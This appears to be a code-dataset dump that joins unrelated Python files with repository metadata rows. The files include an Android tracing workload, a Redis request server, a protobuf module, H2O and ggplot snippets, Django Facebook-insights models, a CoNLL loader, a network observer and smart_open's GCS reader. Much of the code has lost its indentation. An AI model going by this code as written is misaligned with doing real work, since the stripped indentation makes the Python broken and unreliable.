self.trace_cgroup('schedtune', 'background')
self.trace_cgroup('schedtune', 'rt')
self.trace_cgroup('cpuset', '') # root
self.trace_cgroup('cpuset', 'top-app')
self.trace_cgroup('cpuset', 'foreground')
self.trace_cgroup('cpuset', 'background')
self.trace_cgroup('cpuset', 'system-background')
def add_hook(self, hook, hook_fn):
allowed = ['post_collect_start']
if hook not in allowed:
return
self.hooks[hook] = hook_fn
def run(self, out_dir, collect='',
**kwargs):
raise RuntimeError('Not implemented')
def tracingStart(self, screen_always_on=True):
# Keep the screen on during any data collection
if screen_always_on:
System.screen_always_on(self._target, enable=True)
# Reset the dumpsys data for the package
if 'gfxinfo' in self.collect:
System.gfxinfo_reset(self._target, self.package)
if 'surfaceflinger' in self.collect:
System.surfaceflinger_reset(self._target, self.package)
if 'logcat' in self.collect:
System.logcat_reset(self._target)
# Make sure ftrace and systrace are not both specified to be collected
if 'ftrace' in self.collect and 'systrace' in self.collect:
msg = 'ftrace and systrace cannot be used at the same time'
raise ValueError(msg)
# Start FTrace
if 'ftrace' in self.collect:
self.trace_file = os.path.join(self.out_dir, 'trace.dat')
self._log.info('FTrace START')
self._te.ftrace.start()
# Start Systrace (mutually exclusive with ftrace)
elif 'systrace' in self.collect:
self.trace_file = os.path.join(self.out_dir, 'trace.html')
# Get the systrace time
match = re.search(r'systrace_([0-9]+)', self.collect)
self._trace_time = match.group(1) if match else None
self._log.info('Systrace START')
self._target.execute('echo 0 > /d/tracing/tracing_on')
self._systrace_output = System.systrace_start(
self._te, self.trace_file, self._trace_time, conf=self._te.conf)
if 'energy' in self.collect:
# Wait for systrace to start before cutting off USB
while True:
if self._target.execute('cat /d/tracing/tracing_on')[0] == "0":
time.sleep(0.1)
continue
break
# Initializing frequency times
if 'time_in_state' in self.collect:
self._time_in_state_start = self._te.target.cpufreq.get_time_in_state(
self._te.topology.get_level('cluster'))
# Initialize energy meter results
if 'energy' in self.collect and self._te.emeter:
self._te.emeter.reset()
self._log.info('Energy meter STARTED')
# Run post collect hooks passed added by the user of wload object
if 'post_collect_start' in self.hooks:
hookfn = self.hooks['post_collect_start']
self._log.info("Running post collect startup hook {}".format(hookfn.__name__))
hookfn()
def tracingStop(self, screen_always_on=True):
# Collect energy meter results
if 'energy' in self.collect and self._te.emeter:
self.nrg_report = self._te.emeter.report(self.out_dir)
self._log.info('Energy meter STOPPED')
# Calculate the delta in frequency times
if 'time_in_state' in self.collect:
self._te.target.cpufreq.dump_time_in_state_delta(
self._time_in_state_start,
self._te.topology.get_level('cluster'),
os.path.join(self.out_dir, 'time_in_state.json'))
# Stop FTrace
if 'ftrace' in self.collect:
self._te.ftrace.stop()
self._log.info('FTrace STOP')
self._te.ftrace.get_trace(self.trace_file)
# Stop Systrace (mutually exclusive with ftrace)
elif 'systrace' in self.collect:
if not self._systrace_output:
self._log.warning('Systrace is not running!')
else:
self._log.info('Waiting systrace report [%s]...',
self.trace_file)
if self._trace_time is None:
# Systrace expects <enter>
self._systrace_output.sendline('')
self._systrace_output.wait()
# Parse the data gathered from dumpsys gfxinfo
if 'gfxinfo' in self.collect:
dump_file = os.path.join(self.out_dir, 'dumpsys_gfxinfo.txt')
System.gfxinfo_get(self._target, self.package, dump_file)
self.gfxinfo = GfxInfo(dump_file)
# Parse the data gathered from dumpsys SurfaceFlinger
if 'surfaceflinger' in self.collect:
dump_file = os.path.join(self.out_dir, 'dumpsys_surfaceflinger.txt')
System.surfaceflinger_get(self._target, self.package, dump_file)
self.surfaceflinger = SurfaceFlinger(dump_file)
if 'logcat' in self.collect:
dump_file = os.path.join(self.out_dir, 'logcat.txt')
System.logcat_get(self._target, dump_file)
# Dump a platform description
self._te.platform_dump(self.out_dir)
# Restore automatic screen off
if screen_always_on:
System.screen_always_on(self._target, enable=False)
def traceShow(self):
"""
Open the collected trace using the most appropriate native viewer.
The native viewer depends on the specified trace format:
- ftrace: open using kernelshark
- systrace: open using a browser
        In both cases the native viewer is assumed to be available on the
        host machine.
"""
if 'ftrace' in self.collect:
os.popen("kernelshark {}".format(self.trace_file))
return
if 'systrace' in self.collect:
webbrowser.open(self.trace_file)
return
self._log.warning('No trace collected since last run')
# vim :set tabstop=4 shiftwidth=4 expandtab
| 39.433437 | 118 | 0.620947 |
265b9cba52e81f4f871ca6176fcfa13e57dde3b2 | 1,616 | py | Python | elude/servers/redis.py | leonth/elude | 52b8f53cc4bbfa5cb99424eb5386c49abf98acbd | [
"MIT"
] | null | null | null | elude/servers/redis.py | leonth/elude | 52b8f53cc4bbfa5cb99424eb5386c49abf98acbd | [
"MIT"
] | null | null | null | elude/servers/redis.py | leonth/elude | 52b8f53cc4bbfa5cb99424eb5386c49abf98acbd | [
"MIT"
] | null | null | null | import asyncio
import asyncio_redis
from elude import config
from elude.servers import BaseServer
REDIS_REQUEST_WIP_KEY = '_elude:request_wip'
class RedisServer(BaseServer):
def __init__(self, proxy_gatherer, serialize_func, deserialize_func):
super().__init__(proxy_gatherer)
self.serialize = serialize_func
self.deserialize = deserialize_func
self._request_cache = {}
self._conn = None
@asyncio.coroutine
def connect(self):
if self._conn is None:
self._conn = yield from asyncio_redis.Pool.create(host=config.SERVER_REDIS_HOST, port=config.SERVER_REDIS_PORT, password=config.SERVER_REDIS_PASSWORD, db=config.SERVER_REDIS_DB, poolsize=3)
return self._conn
@asyncio.coroutine
def serve(self):
conn = yield from self.connect()
while True:
request_obj_raw = yield from conn.brpoplpush(config.SERVER_REDIS_REQUEST_KEY, REDIS_REQUEST_WIP_KEY)
try:
request_obj = self.deserialize(request_obj_raw)
self.put_request(request_obj)
except ValueError:
self.process_response({'id': None, 'error': {'code': -32700, 'message': 'Parse error'}})
conn.close()
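    # Usage sketch (assuming JSON for (de)serialization and a caller-managed
    # event loop; proxy_gatherer comes from the surrounding application):
    #   server = RedisServer(proxy_gatherer, json.dumps, json.loads)
    #   asyncio.get_event_loop().run_until_complete(server.serve())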
def process_response(self, result):
@asyncio.coroutine
def really_process():
conn = yield from self.connect()
yield from conn.lpush(config.SERVER_REDIS_RESPONSE_KEY_PREFIX + str(result['id']), [self.serialize(result)])
#yield from self.conn.lrem(REDIS_REQUEST_WIP_KEY, , -1)
asyncio.async(really_process()) | 38.47619 | 201 | 0.675124 |
dba122ede03ab049287c750a0d2199034b5cbaee | 2,483 | py | Python | example_pb2.py | Muroger/SVHNClassifier_pytorch | 608e2fc4d7eee0966949533195ad91abca6cf323 | [
"MIT"
] | 177 | 2017-04-02T18:13:13.000Z | 2022-02-22T05:51:06.000Z | example_pb2.py | Muroger/SVHNClassifier_pytorch | 608e2fc4d7eee0966949533195ad91abca6cf323 | [
"MIT"
] | 9 | 2018-01-03T13:52:52.000Z | 2022-02-28T09:03:01.000Z | example_pb2.py | Muroger/SVHNClassifier_pytorch | 608e2fc4d7eee0966949533195ad91abca6cf323 | [
"MIT"
] | 47 | 2017-04-05T09:02:14.000Z | 2021-12-27T05:41:23.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: example.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='example.proto',
package='',
syntax='proto3',
serialized_pb=_b('\n\rexample.proto\"8\n\x07\x45xample\x12\r\n\x05image\x18\x01 \x01(\x0c\x12\x0e\n\x06length\x18\x02 \x01(\x05\x12\x0e\n\x06\x64igits\x18\x03 \x03(\x05\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_EXAMPLE = _descriptor.Descriptor(
name='Example',
full_name='Example',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='image', full_name='Example.image', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='length', full_name='Example.length', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='digits', full_name='Example.digits', index=2,
number=3, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=17,
serialized_end=73,
)
DESCRIPTOR.message_types_by_name['Example'] = _EXAMPLE
Example = _reflection.GeneratedProtocolMessageType('Example', (_message.Message,), dict(
DESCRIPTOR = _EXAMPLE,
__module__ = 'example_pb2'
# @@protoc_insertion_point(class_scope:Example)
))
_sym_db.RegisterMessage(Example)
# @@protoc_insertion_point(module_scope)
| 29.559524 | 186 | 0.733387 |
ee0321d7c553533fec77b298ed8e14c07dc54497 | 537 | py | Python | ggplot/geoms/geom_now_its_art.py | ouseful-backup/ggplot | b5872f04f4e6ee47874eb66676b1d44375d005ef | [
"BSD-2-Clause"
] | 6 | 2016-10-06T08:37:45.000Z | 2019-12-09T06:52:28.000Z | ggplot/geoms/geom_now_its_art.py | vannem/ggplot | 0f3774e6a645796b843d3ce77fb388958773338e | [
"BSD-2-Clause"
] | null | null | null | ggplot/geoms/geom_now_its_art.py | vannem/ggplot | 0f3774e6a645796b843d3ce77fb388958773338e | [
"BSD-2-Clause"
] | 15 | 2015-12-15T05:49:39.000Z | 2021-04-17T09:47:48.000Z | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import matplotlib.image as mpimg
from .geom import geom
import os
_ROOT = os.path.abspath(os.path.dirname(__file__))
class geom_now_its_art(geom):
DEFAULT_AES = {'alpha': 0.5}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity'}
def _plot_unit(self, pinfo, ax):
img = mpimg.imread(os.path.join(_ROOT, 'bird.png'))
ax.imshow(img, alpha=pinfo['alpha'])
print ("Put a bird on it!")
| 29.833333 | 66 | 0.659218 |
6f381d2c11db7d73a4cd543e2bb3bd42e253157d | 2,695 | py | Python | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2ocreate_frame.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2ocreate_frame.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2ocreate_frame.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
import random
from h2o.utils.typechecks import assert_is_type
from h2o.frame import H2OFrame
def h2ocreate_frame():
"""
Python API test: h2o.create_frame(frame_id=None, rows=10000, cols=10, randomize=True, real_fraction=None,
categorical_fraction=None, integer_fraction=None, binary_fraction=None, time_fraction=None,
string_fraction=None, value=0, real_range=100, factors=100, integer_range=100,
binary_ones_fraction=0.02, missing_fraction=0.01, has_response=False, response_factors=2,
positive_response=False, seed=None, seed_for_column_types=None)
Copied from pyunit_NOPASS_javapredict_dynamic_data_paramsDL.py
"""
# Generate random dataset
dataset_params = {}
dataset_params['rows'] = random.sample(list(range(50,150)),1)[0]
dataset_params['cols'] = random.sample(list(range(3,6)),1)[0]
dataset_params['categorical_fraction'] = round(random.random(),1)
left_over = (1 - dataset_params['categorical_fraction'])
dataset_params['integer_fraction'] = round(left_over - round(random.uniform(0,left_over),1),1)
if dataset_params['integer_fraction'] + dataset_params['categorical_fraction'] == 1:
if dataset_params['integer_fraction'] > dataset_params['categorical_fraction']:
dataset_params['integer_fraction'] = dataset_params['integer_fraction'] - 0.1
else:
dataset_params['categorical_fraction'] = dataset_params['categorical_fraction'] - 0.1
dataset_params['missing_fraction'] = random.uniform(0,0.5)
dataset_params['has_response'] = False
dataset_params['randomize'] = True
dataset_params['factors'] = random.randint(2,5)
print("Dataset parameters: {0}".format(dataset_params))
distribution = random.sample(['bernoulli','multinomial','gaussian','poisson','gamma'], 1)[0]
if distribution == 'bernoulli': dataset_params['response_factors'] = 2
elif distribution == 'gaussian': dataset_params['response_factors'] = 1
elif distribution == 'multinomial': dataset_params['response_factors'] = random.randint(3,5)
else:
dataset_params['has_response'] = False
print("Distribution: {0}".format(distribution))
train = h2o.create_frame(**dataset_params)
assert_is_type(train, H2OFrame)
assert train.ncol==dataset_params['cols'], "h2o.create_frame() create frame with wrong column number."
assert train.nrow==dataset_params['rows'], "h2o.create_frame() create frame with wrong row number."
if __name__ == "__main__":
pyunit_utils.standalone_test(h2ocreate_frame)
else:
h2ocreate_frame()
| 49 | 109 | 0.731354 |
a2ae89a9afb5631e2fcf07727c1dd93c80719f73 | 3,162 | py | Python | estatisticas_facebook/pages/models.py | danieldourado/estatisticas_facebook_django | 67274e647cf9e2261f1a7810cd9862a4040dfc06 | [
"MIT"
] | 2 | 2017-12-22T01:00:22.000Z | 2017-12-22T11:14:40.000Z | estatisticas_facebook/pages/models.py | danieldourado/estatisticas_facebook_django | 67274e647cf9e2261f1a7810cd9862a4040dfc06 | [
"MIT"
] | 18 | 2017-12-14T12:04:45.000Z | 2022-03-11T23:23:05.000Z | estatisticas_facebook/pages/models.py | danieldourado/estatisticas_facebook_django | 67274e647cf9e2261f1a7810cd9862a4040dfc06 | [
"MIT"
] | 1 | 2021-03-27T16:18:56.000Z | 2021-03-27T16:18:56.000Z | from django.db import models
from django.db.models.signals import pre_save, post_save
from .utils import unique_slug_generator
from django.utils.dateformat import DateFormat, TimeFormat
from estatisticas_facebook.util.graph import *
def getPageInfo(page):
raw_json = getNewGraphApi(page.name).get_object(page.name)
print (raw_json)
page.pretty_name = raw_json['name']
page.id = raw_json['id']
def getPageInsights(args):
PageInsights.objects.all().delete()
since = args['since']
raw_json = get_graph_object(args['id'],args['id']+'/insights?period=day&metric=page_fan_adds_unique,page_impressions_unique,page_engaged_users,page_stories,page_storytellers&since='+str(since))
pagedata = raw_json['data']
for obj in pagedata:
print (obj['name'])
for value in obj['values']:
page_insights = PageInsights(
name=obj['name'],
period=obj['period'],
title=obj['title'],
description=obj['description'],
end_time=value['end_time'],
value=value['value'],
page_id=args['id'])
page_insights.save()
# Create your models here.
class Page(models.Model):
id = models.CharField(primary_key = True, max_length = 45)
name = models.CharField(max_length = 18000, unique=True)
pretty_name = models.CharField(max_length = 18000,null=True, blank=True)
access_token = models.CharField(max_length = 18000,null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
slug = models.SlugField(null=True, blank=True)
post_paging = models.CharField(max_length = 512, null=True)
post_since = models.DateTimeField(null=True)
def __str__(self):
return self.name
@property
def title(self):
return self.name
class PageInsights(models.Model):
page = models.ForeignKey(Page)
value = models.IntegerField()
end_time = models.DateTimeField()
period = models.CharField(max_length = 50)
title = models.CharField(max_length = 4500)
description = models.CharField(max_length = 4500)
name = models.CharField(max_length = 4500)
created = models.DateTimeField(auto_now_add=True)
slug = models.SlugField(null=True, blank=True)
def __str__(self):
return str(DateFormat(self.end_time).format('Y-m-d')) +': '+ self.title+' '+str(self.value)
def page_pre_save_reciever(sender, instance, *args, **kwargs):
if not instance.pretty_name:
getPageInfo(instance)
def slug_pre_save_reciever(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = unique_slug_generator(instance)
#def rl_post_save_reciever(sender, instance, *args, **kwargs):
pre_save.connect(slug_pre_save_reciever, sender=PageInsights)
pre_save.connect(slug_pre_save_reciever, sender=Page)
pre_save.connect(page_pre_save_reciever, sender=Page)
#post_save.connect(rl_pre_save_reciever, sender=PageInsights)
| 37.642857 | 197 | 0.65876 |
1e62b042c77197697834e7229d9a8257630a1955 | 2,649 | py | Python | parser/utils/corpus.py | Muhamob/biaffine-parser | ffcbc4e48750da45b913b13597cca4429f4e6f93 | [
"MIT"
] | 1 | 2021-06-16T15:41:38.000Z | 2021-06-16T15:41:38.000Z | parser/utils/corpus.py | Muhamob/biaffine-parser | ffcbc4e48750da45b913b13597cca4429f4e6f93 | [
"MIT"
] | null | null | null | parser/utils/corpus.py | Muhamob/biaffine-parser | ffcbc4e48750da45b913b13597cca4429f4e6f93 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from collections import namedtuple
from collections.abc import Iterable
from parser.utils.field import Field
CoNLL = namedtuple(typename='CoNLL',
field_names=['ID', 'FORM', 'LEMMA', 'CPOS', 'POS',
'FEATS', 'HEAD', 'DEPREL', 'PHEAD', 'PDEPREL'],)
CoNLL.__new__.__defaults__ = tuple([None]*10)
class Sentence(object):
def __init__(self, fields, values):
for field, value in zip(fields, values):
if isinstance(field, Iterable):
for j in range(len(field)):
setattr(self, field[j].name, value)
else:
setattr(self, field.name, value)
self.fields = fields
@property
def values(self):
for field in self.fields:
if isinstance(field, Iterable):
yield getattr(self, field[0].name)
else:
yield getattr(self, field.name)
def __len__(self):
return len(next(iter(self.values)))
def __repr__(self):
return '\n'.join('\t'.join(map(str, line))
for line in zip(*self.values)) + '\n'
class Corpus(object):
def __init__(self, fields, sentences):
super(Corpus, self).__init__()
self.fields = fields
self.sentences = sentences
def __len__(self):
return len(self.sentences)
def __repr__(self):
return '\n'.join(str(sentence) for sentence in self)
def __getitem__(self, index):
return self.sentences[index]
def __getattr__(self, name):
if not hasattr(self.sentences[0], name):
raise AttributeError
for sentence in self.sentences:
yield getattr(sentence, name)
def __setattr__(self, name, value):
if name in ['fields', 'sentences']:
self.__dict__[name] = value
else:
for i, sentence in enumerate(self.sentences):
setattr(sentence, name, value[i])
@classmethod
def load(cls, path, fields):
start, sentences = 0, []
fields = [field if field is not None else Field(str(i))
for i, field in enumerate(fields)]
with open(path, 'r') as f:
lines = [line.strip() for line in f]
for i, line in enumerate(lines):
if not line:
values = list(zip(*[l.split('\t') for l in lines[start:i]]))
sentences.append(Sentence(fields, values))
start = i + 1
return cls(fields, sentences)
def save(self, path):
with open(path, 'w') as f:
f.write(f"{self}\n")
| 30.102273 | 80 | 0.556059 |
637c8376ebe20de84e466f3fef14b4f5e117be5d | 1,984 | py | Python | network.py | machinbrol/evolution-tray | d4fdbed8b9aa325eb068433455582f8f53d073b9 | [
"WTFPL"
] | null | null | null | network.py | machinbrol/evolution-tray | d4fdbed8b9aa325eb068433455582f8f53d073b9 | [
"WTFPL"
] | null | null | null | network.py | machinbrol/evolution-tray | d4fdbed8b9aa325eb068433455582f8f53d073b9 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This is not pub/sub but rather the observer pattern:
# in pub/sub there would be a third intermediate element, a "message broker".
from pyroute2 import IPRoute
from pyroute2.netlink.exceptions import NetlinkError
class Network:
def __init__(self):
self._is_network_down = False
self._ip_has_changed = False
self._state_has_changed = False
_, self._previous_ip = self._check()
self._subscribers_list = list()
def subscribe(self, obj):
if not hasattr(obj, "get_state"):
raise Exception("L'objet doit avoir une méthode 'get_state' qui prend deux booléens en paramètre")
self._subscribers_list.append(obj)
def _publish(self):
for obj in self._subscribers_list:
obj.get_state(self._state_has_changed, self._is_network_down)
def _check(self):
_is_network_down = False
_actual_ip = ""
with IPRoute() as ip:
try:
route = ip.route('get', dst='8.8.8.8')[0]
except NetlinkError:
_is_network_down = True
if not _is_network_down:
_actual_ip = route.get_attr("RTA_PREFSRC")
return _is_network_down, _actual_ip
    # Check whether the network is up and whether the IP has changed since the previous check
def check(self):
_ip_has_changed = False
_is_network_down, _actual_ip = self._check()
if not _is_network_down:
_ip_has_changed = self._previous_ip != _actual_ip
if (self._is_network_down, self._ip_has_changed) != (_is_network_down, _ip_has_changed):
self._state_has_changed = True
else:
self._state_has_changed = False
self._is_network_down, self._ip_has_changed = _is_network_down, _ip_has_changed
self._previous_ip = _actual_ip
self._publish()
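# Usage sketch: any object exposing get_state(state_has_changed,
# is_network_down) can subscribe and is notified on every check().
#   class Printer:
#       def get_state(self, changed, down):
#           if changed:
#               print('network down' if down else 'network up / IP changed')
#   net = Network()
#   net.subscribe(Printer())
#   net.check()  # typically called periodically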
| 28.342857 | 110 | 0.624496 |
1baa4b4ef2b315825b25bb1e03c49993b73438b6 | 19,654 | py | Python | smart_open/gcs.py | sivchand/smart_open | 35d80d3bec5324c19427ce49fa8284f5b1c2c112 | [
"MIT"
] | 2,047 | 2016-06-16T15:35:45.000Z | 2022-03-31T04:32:57.000Z | smart_open/gcs.py | sivchand/smart_open | 35d80d3bec5324c19427ce49fa8284f5b1c2c112 | [
"MIT"
] | 524 | 2016-06-16T09:48:14.000Z | 2022-03-30T13:21:25.000Z | smart_open/gcs.py | sivchand/smart_open | 35d80d3bec5324c19427ce49fa8284f5b1c2c112 | [
"MIT"
] | 308 | 2016-06-16T09:02:51.000Z | 2022-03-24T20:57:52.000Z | # -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
#
"""Implements file-like objects for reading and writing to/from GCS."""
import io
import logging
try:
import google.cloud.exceptions
import google.cloud.storage
import google.auth.transport.requests
except ImportError:
MISSING_DEPS = True
import smart_open.bytebuffer
import smart_open.utils
from smart_open import constants
logger = logging.getLogger(__name__)
_BINARY_TYPES = (bytes, bytearray, memoryview)
"""Allowed binary buffer types for writing to the underlying GCS stream"""
_UNKNOWN = '*'
SCHEME = "gs"
"""Supported scheme for GCS"""
_MIN_MIN_PART_SIZE = _REQUIRED_CHUNK_MULTIPLE = 256 * 1024
"""Google requires you to upload in multiples of 256 KB, except for the last part."""
_DEFAULT_MIN_PART_SIZE = 50 * 1024**2
"""Default minimum part size for GCS multipart uploads"""
DEFAULT_BUFFER_SIZE = 256 * 1024
"""Default buffer size for working with GCS"""
_UPLOAD_INCOMPLETE_STATUS_CODES = (308, )
_UPLOAD_COMPLETE_STATUS_CODES = (200, 201)
def _make_range_string(start, stop=None, end=None):
#
# GCS seems to violate RFC-2616 (see utils.make_range_string), so we
# need a separate implementation.
#
# https://cloud.google.com/storage/docs/xml-api/resumable-upload#step_3upload_the_file_blocks
#
if end is None:
end = _UNKNOWN
if stop is None:
return 'bytes %d-/%s' % (start, end)
return 'bytes %d-%d/%s' % (start, stop, end)
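# Content-Range values this helper produces (assumed example inputs):
#   _make_range_string(0, 262143)             -> 'bytes 0-262143/*'
#   _make_range_string(0, 262143, end=524288) -> 'bytes 0-262143/524288'
#   _make_range_string(524288)                -> 'bytes 524288-/*'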
class UploadFailedError(Exception):
def __init__(self, message, status_code, text):
"""Raise when a multi-part upload to GCS returns a failed response status code.
Parameters
----------
message: str
The error message to display.
status_code: int
The status code returned from the upload response.
text: str
The text returned from the upload response.
"""
super(UploadFailedError, self).__init__(message)
self.status_code = status_code
self.text = text
def _fail(response, part_num, content_length, total_size, headers):
status_code = response.status_code
response_text = response.text
total_size_gb = total_size / 1024.0 ** 3
msg = (
"upload failed (status code: %(status_code)d, response text: %(response_text)s), "
"part #%(part_num)d, %(total_size)d bytes (total %(total_size_gb).3fGB), headers: %(headers)r"
) % locals()
raise UploadFailedError(msg, response.status_code, response.text)
def parse_uri(uri_as_string):
sr = smart_open.utils.safe_urlsplit(uri_as_string)
assert sr.scheme == SCHEME
bucket_id = sr.netloc
blob_id = sr.path.lstrip('/')
return dict(scheme=SCHEME, bucket_id=bucket_id, blob_id=blob_id)
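# Example (assumed URI): parse_uri('gs://my-bucket/path/to/blob') returns
# {'scheme': 'gs', 'bucket_id': 'my-bucket', 'blob_id': 'path/to/blob'}.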
def open_uri(uri, mode, transport_params):
parsed_uri = parse_uri(uri)
kwargs = smart_open.utils.check_kwargs(open, transport_params)
return open(parsed_uri['bucket_id'], parsed_uri['blob_id'], mode, **kwargs)
def open(
bucket_id,
blob_id,
mode,
buffer_size=DEFAULT_BUFFER_SIZE,
min_part_size=_MIN_MIN_PART_SIZE,
client=None, # type: google.cloud.storage.Client
blob_properties=None
):
"""Open an GCS blob for reading or writing.
Parameters
----------
bucket_id: str
The name of the bucket this object resides in.
blob_id: str
The name of the blob within the bucket.
mode: str
The mode for opening the object. Must be either "rb" or "wb".
buffer_size: int, optional
The buffer size to use when performing I/O. For reading only.
min_part_size: int, optional
The minimum part size for multipart uploads. For writing only.
client: google.cloud.storage.Client, optional
The GCS client to use when working with google-cloud-storage.
blob_properties: dict, optional
Set properties on blob before writing. For writing only.
"""
if mode == constants.READ_BINARY:
fileobj = Reader(
bucket_id,
blob_id,
buffer_size=buffer_size,
line_terminator=constants.BINARY_NEWLINE,
client=client,
)
elif mode == constants.WRITE_BINARY:
fileobj = Writer(
bucket_id,
blob_id,
min_part_size=min_part_size,
client=client,
blob_properties=blob_properties,
)
else:
raise NotImplementedError('GCS support for mode %r not implemented' % mode)
fileobj.name = blob_id
return fileobj
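# Usage sketch (assumes an existing bucket and blob, and default GCP
# credentials available in the environment):
#
#   with open('my-bucket', 'path/to/blob.txt', 'rb') as fin:
#       data = fin.read()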
class _RawReader(object):
"""Read an GCS object."""
def __init__(self, gcs_blob, size):
# type: (google.cloud.storage.Blob, int) -> None
self._blob = gcs_blob
self._size = size
self._position = 0
def seek(self, position):
"""Seek to the specified position (byte offset) in the GCS key.
:param int position: The byte offset from the beginning of the key.
Returns the position after seeking.
"""
self._position = position
return self._position
def read(self, size=-1):
if self._position >= self._size:
return b''
binary = self._download_blob_chunk(size)
self._position += len(binary)
return binary
def _download_blob_chunk(self, size):
start = position = self._position
if position == self._size:
#
# When reading, we can't seek to the first byte of an empty file.
# Similarly, we can't seek past the last byte. Do nothing here.
#
binary = b''
elif size == -1:
binary = self._blob.download_as_bytes(start=start)
else:
end = position + size
binary = self._blob.download_as_bytes(start=start, end=end)
return binary
class Reader(io.BufferedIOBase):
"""Reads bytes from GCS.
Implements the io.BufferedIOBase interface of the standard library.
:raises google.cloud.exceptions.NotFound: Raised when the blob to read from does not exist.
"""
def __init__(
self,
bucket,
key,
buffer_size=DEFAULT_BUFFER_SIZE,
line_terminator=constants.BINARY_NEWLINE,
client=None, # type: google.cloud.storage.Client
):
if client is None:
client = google.cloud.storage.Client()
self._blob = client.bucket(bucket).get_blob(key) # type: google.cloud.storage.Blob
if self._blob is None:
raise google.cloud.exceptions.NotFound('blob %s not found in %s' % (key, bucket))
self._size = self._blob.size if self._blob.size is not None else 0
self._raw_reader = _RawReader(self._blob, self._size)
self._current_pos = 0
self._current_part_size = buffer_size
self._current_part = smart_open.bytebuffer.ByteBuffer(buffer_size)
self._eof = False
self._line_terminator = line_terminator
#
# This member is part of the io.BufferedIOBase interface.
#
self.raw = None
#
# Override some methods from io.IOBase.
#
def close(self):
"""Flush and close this stream."""
logger.debug("close: called")
self._blob = None
self._current_part = None
self._raw_reader = None
def readable(self):
"""Return True if the stream can be read from."""
return True
def seekable(self):
"""If False, seek(), tell() and truncate() will raise IOError.
We offer only seek support, and no truncate support."""
return True
#
# io.BufferedIOBase methods.
#
def detach(self):
"""Unsupported."""
raise io.UnsupportedOperation
def seek(self, offset, whence=constants.WHENCE_START):
"""Seek to the specified position.
:param int offset: The offset in bytes.
:param int whence: Where the offset is from.
Returns the position after seeking."""
logger.debug('seeking to offset: %r whence: %r', offset, whence)
if whence not in constants.WHENCE_CHOICES:
raise ValueError('invalid whence, expected one of %r' % constants.WHENCE_CHOICES)
if whence == constants.WHENCE_START:
new_position = offset
elif whence == constants.WHENCE_CURRENT:
new_position = self._current_pos + offset
else:
new_position = self._size + offset
new_position = smart_open.utils.clamp(new_position, 0, self._size)
self._current_pos = new_position
self._raw_reader.seek(new_position)
logger.debug('current_pos: %r', self._current_pos)
self._current_part.empty()
self._eof = self._current_pos == self._size
return self._current_pos
def tell(self):
"""Return the current position within the file."""
return self._current_pos
def truncate(self, size=None):
"""Unsupported."""
raise io.UnsupportedOperation
def read(self, size=-1):
"""Read up to size bytes from the object and return them."""
if size == 0:
return b''
elif size < 0:
self._current_pos = self._size
return self._read_from_buffer() + self._raw_reader.read()
#
# Return unused data first
#
if len(self._current_part) >= size:
return self._read_from_buffer(size)
#
# If the stream is finished, return what we have.
#
if self._eof:
return self._read_from_buffer()
#
# Fill our buffer to the required size.
#
self._fill_buffer(size)
return self._read_from_buffer(size)
def read1(self, size=-1):
"""This is the same as read()."""
return self.read(size=size)
def readinto(self, b):
"""Read up to len(b) bytes into b, and return the number of bytes
read."""
data = self.read(len(b))
if not data:
return 0
b[:len(data)] = data
return len(data)
def readline(self, limit=-1):
"""Read up to and including the next newline. Returns the bytes read."""
if limit != -1:
raise NotImplementedError('limits other than -1 not implemented yet')
the_line = io.BytesIO()
while not (self._eof and len(self._current_part) == 0):
#
# In the worst case, we're reading the unread part of self._current_part
# twice here, once in the if condition and once when calling index.
#
# This is sub-optimal, but better than the alternative: wrapping
# .index in a try..except, because that is slower.
#
remaining_buffer = self._current_part.peek()
if self._line_terminator in remaining_buffer:
next_newline = remaining_buffer.index(self._line_terminator)
the_line.write(self._read_from_buffer(next_newline + 1))
break
else:
the_line.write(self._read_from_buffer())
self._fill_buffer()
return the_line.getvalue()
#
# Internal methods.
#
def _read_from_buffer(self, size=-1):
